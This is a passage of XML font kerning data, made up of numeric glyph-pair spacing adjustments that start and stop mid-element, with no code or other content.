kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="81"><pair kern="-72" kpx2="180"/><pair kern="-44" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="98"><pair 
kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="212"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="229"><pair kern="-17" kpx2="180"/><pair kern="-17" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="38"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair 
kern="-17" kpx2="234"/></kerning><kerning kpx1="121"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="57"><pair kern="-67" kpx2="126"/><pair kern="-77" kpx2="107"/><pair kern="-26" kpx2="235"/><pair kern="-77" kpx2="72"/><pair kern="-63" kpx2="199"/><pair kern="-58" kpx2="16"/><pair kern="-77" kpx2="123"/><pair kern="-77" kpx2="112"/><pair kern="-17" kpx2="208"/><pair kern="-77" kpx2="113"/><pair kern="-77" kpx2="105"/><pair kern="-67" kpx2="129"/><pair kern="-77" kpx2="124"/><pair kern="-86" kpx2="169"/><pair kern="-63" kpx2="201"/><pair kern="-77" kpx2="106"/><pair kern="-81" kpx2="29"/><pair kern="-77" kpx2="125"/><pair kern="-54" kpx2="170"/><pair kern="-77" kpx2="115"/><pair kern="-67" kpx2="88"/><pair kern="-77" kpx2="122"/><pair kern="-77" kpx2="68"/><pair kern="-17" kpx2="210"/><pair kern="-63" kpx2="36"/><pair kern="-77" kpx2="82"/><pair kern="-26" kpx2="186"/><pair kern="-77" kpx2="114"/><pair kern="-17" kpx2="175"/><pair kern="-67" kpx2="127"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-77" kpx2="108"/><pair kern="-63" kpx2="98"/><pair kern="-21" kpx2="76"/><pair kern="-128" kpx2="17"/><pair kern="-67" kpx2="128"/><pair kern="-63" kpx2="173"/><pair kern="-77" kpx2="109"/><pair kern="-137" kpx2="197"/><pair kern="-26" kpx2="92"/><pair kern="-77" kpx2="121"/><pair kern="-77" kpx2="110"/><pair kern="-63" kpx2="174"/></kerning><kerning kpx1="37"><pair kern="-17" kpx2="227"/><pair kern="-17" kpx2="246"/><pair kern="-17" kpx2="251"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-17" kpx2="54"/><pair kern="-54" kpx2="180"/><pair kern="-30" kpx2="169"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="170"/><pair kern="-54" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" 
kpx2="210"/><pair kern="-35" kpx2="58"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-54" kpx2="181"/><pair kern="-40" kpx2="197"/><pair kern="-17" kpx2="38"/><pair kern="-30" kpx2="57"/><pair kern="-17" kpx2="249"/></kerning><kerning kpx1="120"><pair kern="-72" kpx2="180"/><pair kern="-44" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="249"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="227"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="51"><pair kern="-17" kpx2="126"/><pair kern="-44" kpx2="107"/><pair kern="-35" kpx2="72"/><pair kern="-63" kpx2="199"/><pair kern="-21" kpx2="16"/><pair kern="-35" kpx2="123"/><pair kern="-35" kpx2="112"/><pair kern="-21" kpx2="187"/><pair kern="-35" kpx2="113"/><pair kern="-17" kpx2="86"/><pair kern="18" kpx2="180"/><pair kern="-44" kpx2="105"/><pair kern="-17" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-17" kpx2="169"/><pair kern="-63" kpx2="201"/><pair kern="-17" kpx2="85"/><pair kern="-21" kpx2="60"/><pair kern="-44" kpx2="106"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="115"/><pair kern="-21" kpx2="234"/><pair kern="-17" kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-44" kpx2="68"/><pair kern="-63" kpx2="36"/><pair kern="-35" kpx2="82"/><pair kern="-35" kpx2="114"/><pair kern="-17" kpx2="250"/><pair kern="-17" kpx2="127"/><pair kern="-44" kpx2="108"/><pair kern="-63" kpx2="98"/><pair kern="-17" kpx2="81"/><pair kern="-21" kpx2="76"/><pair kern="18" kpx2="181"/><pair kern="-155" kpx2="17"/><pair kern="-17" kpx2="128"/><pair kern="-63" kpx2="173"/><pair kern="-44" kpx2="109"/><pair kern="-160" kpx2="197"/><pair kern="-35" 
kpx2="121"/><pair kern="-17" kpx2="228"/><pair kern="-44" kpx2="110"/><pair kern="-63" kpx2="174"/><pair kern="-17" kpx2="120"/></kerning><kerning kpx1="104"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="72"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="199"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="54"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" 
kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="180"><pair kern="-35" kpx2="235"/><pair kern="-35" kpx2="246"/><pair kern="-30" kpx2="43"/><pair kern="-72" kpx2="123"/><pair kern="-35" kpx2="251"/><pair kern="-35" kpx2="208"/><pair kern="-188" kpx2="144"/><pair kern="-58" kpx2="59"/><pair kern="-35" kpx2="73"/><pair kern="-30" kpx2="41"/><pair kern="-72" kpx2="124"/><pair kern="-54" kpx2="85"/><pair kern="-128" kpx2="201"/><pair kern="-17" kpx2="61"/><pair kern="-35" kpx2="100"/><pair kern="-72" kpx2="122"/><pair kern="-30" kpx2="47"/><pair kern="-35" kpx2="210"/><pair kern="-72" kpx2="82"/><pair kern="-35" kpx2="186"/><pair kern="-35" kpx2="175"/><pair kern="-35" kpx2="209"/><pair kern="-35" kpx2="103"/><pair kern="-128" kpx2="98"/><pair kern="-54" kpx2="81"/><pair kern="-17" kpx2="229"/><pair kern="-35" kpx2="38"/><pair kern="-72" kpx2="121"/><pair kern="-30" kpx2="37"/><pair kern="-54" kpx2="120"/><pair kern="-30" kpx2="51"/><pair kern="-128" kpx2="199"/><pair kern="-30" kpx2="53"/><pair kern="-30" kpx2="137"/><pair kern="-35" kpx2="233"/><pair kern="-35" kpx2="253"/><pair kern="-35" kpx2="52"/><pair kern="-72" kpx2="125"/><pair kern="-35" kpx2="42"/><pair kern="-35" kpx2="90"/><pair kern="-128" kpx2="36"/><pair kern="-35" kpx2="50"/><pair kern="-30" kpx2="39"/><pair kern="-30" kpx2="236"/><pair kern="-30" kpx2="45"/><pair kern="-128" kpx2="173"/><pair kern="-35" kpx2="92"/><pair kern="-35" kpx2="89"/><pair kern="-30" kpx2="46"/><pair kern="-128" kpx2="174"/></kerning><kerning kpx1="53"><pair kern="-21" kpx2="107"/><pair kern="-54" kpx2="235"/><pair kern="-40" kpx2="16"/><pair kern="-44" kpx2="112"/><pair kern="-44" kpx2="123"/><pair kern="-49" kpx2="251"/><pair kern="-44" kpx2="113"/><pair kern="-63" kpx2="187"/><pair kern="-44" kpx2="129"/><pair kern="-44" kpx2="124"/><pair kern="-54" kpx2="169"/><pair kern="-63" kpx2="60"/><pair kern="-40" kpx2="201"/><pair kern="-21" kpx2="106"/><pair 
kern="-30" kpx2="29"/><pair kern="-63" kpx2="234"/><pair kern="-49" kpx2="100"/><pair kern="-44" kpx2="122"/><pair kern="-21" kpx2="68"/><pair kern="-40" kpx2="58"/><pair kern="-44" kpx2="82"/><pair kern="-54" kpx2="186"/><pair kern="-40" kpx2="98"/><pair kern="-63" kpx2="181"/><pair kern="-35" kpx2="17"/><pair kern="-49" kpx2="38"/><pair kern="-44" kpx2="121"/><pair kern="-54" kpx2="57"/><pair kern="-44" kpx2="126"/><pair kern="-44" kpx2="72"/><pair kern="-40" kpx2="199"/><pair kern="-72" kpx2="180"/><pair kern="-21" kpx2="105"/><pair kern="-49" kpx2="253"/><pair kern="-44" kpx2="125"/><pair kern="-44" kpx2="115"/><pair kern="-17" kpx2="170"/><pair kern="-44" kpx2="88"/><pair kern="-40" kpx2="36"/><pair kern="-44" kpx2="114"/><pair kern="-72" kpx2="55"/><pair kern="-44" kpx2="127"/><pair kern="-21" kpx2="108"/><pair kern="-44" kpx2="128"/><pair kern="-40" kpx2="173"/><pair kern="-21" kpx2="109"/><pair kern="-54" kpx2="92"/><pair kern="-17" kpx2="197"/><pair kern="-21" kpx2="110"/><pair kern="-40" kpx2="174"/></kerning><kerning kpx1="137"><pair kern="-54" kpx2="180"/><pair kern="-40" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="233"><pair kern="-44" kpx2="180"/><pair kern="-35" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="253"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="211"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="78"><pair kern="-17" kpx2="107"/><pair kern="-30" kpx2="126"/><pair kern="-35" kpx2="235"/><pair kern="-35" kpx2="72"/><pair kern="-35" kpx2="112"/><pair kern="-35" kpx2="123"/><pair kern="-35" kpx2="113"/><pair kern="-17" kpx2="105"/><pair kern="-30" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-17" kpx2="106"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="115"/><pair kern="-30" 
kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-17" kpx2="68"/><pair kern="-35" kpx2="82"/><pair kern="-35" kpx2="114"/><pair kern="-35" kpx2="186"/><pair kern="-30" kpx2="127"/><pair kern="-17" kpx2="108"/><pair kern="-30" kpx2="128"/><pair kern="-17" kpx2="109"/><pair kern="-35" kpx2="92"/><pair kern="-35" kpx2="121"/><pair kern="-17" kpx2="110"/></kerning><kerning kpx1="52"><pair kern="-21" kpx2="180"/><pair kern="-63" kpx2="197"/><pair kern="27" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="125"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="42"><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="169"/><pair kern="-26" kpx2="197"/><pair kern="-35" kpx2="55"/><pair kern="-49" kpx2="60"/><pair kern="-49" kpx2="187"/><pair kern="-21" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-49" kpx2="234"/></kerning><kerning kpx1="170"><pair kern="-17" kpx2="235"/><pair kern="-35" kpx2="199"/><pair kern="-17" kpx2="251"/><pair kern="-109" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-54" kpx2="59"/><pair kern="-109" kpx2="60"/><pair kern="-35" kpx2="201"/><pair kern="-17" kpx2="253"/><pair kern="-109" kpx2="234"/><pair kern="-17" kpx2="90"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="210"/><pair kern="-35" kpx2="36"/><pair kern="-54" kpx2="58"/><pair kern="-91" kpx2="55"/><pair kern="-17" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-17" kpx2="39"/><pair kern="-35" kpx2="98"/><pair kern="-17" kpx2="45"/><pair kern="-35" kpx2="173"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="89"/><pair kern="-86" kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-35" kpx2="174"/></kerning><kerning kpx1="115"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="90"><pair 
kern="-91" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-104" kpx2="197"/><pair kern="-54" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="36"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="55"><pair kern="-165" kpx2="107"/><pair kern="-155" kpx2="235"/><pair kern="-91" kpx2="16"/><pair kern="-169" kpx2="112"/><pair kern="-169" kpx2="123"/><pair kern="-58" kpx2="251"/><pair kern="-169" 
kpx2="113"/><pair kern="-165" kpx2="86"/><pair kern="-151" kpx2="129"/><pair kern="-169" kpx2="124"/><pair kern="-91" kpx2="169"/><pair kern="-169" kpx2="252"/><pair kern="-169" kpx2="70"/><pair kern="-146" kpx2="85"/><pair kern="-77" kpx2="201"/><pair kern="-165" kpx2="106"/><pair kern="-109" kpx2="29"/><pair kern="-58" kpx2="100"/><pair kern="-169" kpx2="122"/><pair kern="-165" kpx2="68"/><pair kern="-169" kpx2="82"/><pair kern="-155" kpx2="186"/><pair kern="-165" kpx2="250"/><pair kern="-77" kpx2="98"/><pair kern="-21" kpx2="181"/><pair kern="-118" kpx2="17"/><pair kern="-58" kpx2="38"/><pair kern="-169" kpx2="121"/><pair kern="-165" kpx2="228"/><pair kern="-169" kpx2="254"/><pair kern="-151" kpx2="126"/><pair kern="-169" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-165" kpx2="105"/><pair kern="-58" kpx2="253"/><pair kern="-169" kpx2="125"/><pair kern="-169" kpx2="115"/><pair kern="-54" kpx2="170"/><pair kern="-151" kpx2="88"/><pair kern="-169" kpx2="111"/><pair kern="-165" kpx2="90"/><pair kern="-77" kpx2="36"/><pair kern="-17" kpx2="55"/><pair kern="-169" kpx2="114"/><pair kern="-151" kpx2="127"/><pair kern="-165" kpx2="108"/><pair kern="-30" kpx2="76"/><pair kern="-151" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-165" kpx2="109"/><pair kern="-155" kpx2="92"/><pair kern="-128" kpx2="197"/><pair kern="-165" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="114"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="50"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" 
kpx2="234"/></kerning><kerning kpx1="91"><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="111"/><pair kern="-30" kpx2="122"/><pair kern="-30" kpx2="82"/><pair kern="-30" kpx2="114"/><pair kern="-30" kpx2="72"/><pair kern="-30" kpx2="112"/><pair kern="-30" kpx2="123"/><pair kern="-30" kpx2="113"/><pair kern="-30" kpx2="124"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-30" kpx2="121"/><pair kern="-30" kpx2="125"/><pair kern="-30" kpx2="115"/></kerning><kerning kpx1="39"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="-17" kpx2="98"/><pair kern="-54" kpx2="187"/><pair kern="-26" kpx2="181"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-17" kpx2="170"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="236"><pair kern="-17" kpx2="180"/><pair kern="-72" kpx2="17"/><pair kern="-91" kpx2="197"/><pair kern="-35" kpx2="29"/></kerning><kerning kpx1="45"><pair kern="-35" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="169"/><pair kern="-54" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-17" kpx2="199"/><pair kern="-35" kpx2="16"/><pair kern="-17" kpx2="174"/><pair kern="-17" kpx2="98"/><pair kern="-30" kpx2="181"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="173"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" 
kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="197"><pair kern="-35" kpx2="246"/><pair kern="-54" kpx2="235"/><pair kern="-35" kpx2="43"/><pair kern="-35" kpx2="123"/><pair kern="-54" kpx2="251"/><pair kern="-183" kpx2="187"/><pair kern="-54" kpx2="208"/><pair kern="18" kpx2="144"/><pair kern="-35" kpx2="59"/><pair kern="-17" kpx2="73"/><pair kern="-35" kpx2="41"/><pair kern="-35" kpx2="124"/><pair kern="-35" kpx2="85"/><pair kern="-183" kpx2="60"/><pair kern="18" kpx2="201"/><pair kern="-183" kpx2="234"/><pair kern="-54" kpx2="100"/><pair kern="-35" kpx2="122"/><pair kern="-35" kpx2="47"/><pair kern="-54" kpx2="210"/><pair kern="-35" kpx2="82"/><pair kern="-123" kpx2="58"/><pair kern="-54" kpx2="186"/><pair kern="-54" kpx2="175"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-35" kpx2="81"/><pair kern="18" kpx2="98"/><pair kern="-54" kpx2="38"/><pair kern="-35" kpx2="121"/><pair kern="-183" 
kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-35" kpx2="120"/><pair kern="-35" kpx2="51"/><pair kern="18" kpx2="199"/><pair kern="-35" kpx2="53"/><pair kern="-35" kpx2="137"/><pair kern="-35" kpx2="233"/><pair kern="-54" kpx2="253"/><pair kern="-54" kpx2="52"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="42"/><pair kern="-95" kpx2="90"/><pair kern="18" kpx2="36"/><pair kern="-137" kpx2="55"/><pair kern="-54" kpx2="50"/><pair kern="-35" kpx2="39"/><pair kern="-35" kpx2="236"/><pair kern="22" kpx2="45"/><pair kern="18" kpx2="173"/><pair kern="-54" kpx2="92"/><pair kern="-114" kpx2="89"/><pair kern="-35" kpx2="46"/><pair kern="18" kpx2="174"/></kerning><kerning kpx1="92"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="89"><pair kern="-77" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-132" kpx2="197"/><pair kern="-26" kpx2="16"/><pair kern="-54" kpx2="29"/><pair kern="-17" kpx2="181"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="46"><pair kern="-17" kpx2="107"/><pair kern="-72" kpx2="235"/><pair kern="-104" kpx2="16"/><pair kern="-49" kpx2="112"/><pair kern="-49" kpx2="123"/><pair kern="-54" kpx2="251"/><pair kern="-26" kpx2="213"/><pair kern="-49" kpx2="113"/><pair kern="-35" kpx2="187"/><pair kern="-54" kpx2="208"/><pair kern="-49" kpx2="129"/><pair kern="-49" kpx2="124"/><pair kern="-63" kpx2="169"/><pair kern="-35" kpx2="60"/><pair kern="-17" kpx2="201"/><pair kern="-17" kpx2="106"/><pair kern="-35" kpx2="234"/><pair kern="-54" kpx2="100"/><pair kern="-49" kpx2="122"/><pair kern="-17" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-35" kpx2="58"/><pair kern="-49" kpx2="82"/><pair kern="-72" kpx2="186"/><pair kern="-54" kpx2="175"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-17" kpx2="98"/><pair kern="-30" kpx2="181"/><pair kern="-26" kpx2="212"/><pair 
kern="-54" kpx2="38"/><pair kern="-49" kpx2="121"/><pair kern="-49" kpx2="126"/><pair kern="-26" kpx2="104"/><pair kern="-49" kpx2="72"/><pair kern="-17" kpx2="199"/><pair kern="-30" kpx2="180"/><pair kern="-17" kpx2="105"/><pair kern="-54" kpx2="253"/><pair kern="-26" kpx2="211"/><pair kern="-49" kpx2="125"/><pair kern="-49" kpx2="115"/><pair kern="-49" kpx2="88"/><pair kern="-17" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-49" kpx2="114"/><pair kern="-54" kpx2="50"/><pair kern="-49" kpx2="127"/><pair kern="-17" kpx2="108"/><pair kern="-49" kpx2="128"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="109"/><pair kern="-72" kpx2="92"/><pair kern="-17" kpx2="110"/><pair kern="-17" kpx2="174"/><pair kern="-26" kpx2="56"/></kerning><kerning kpx1="174"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" 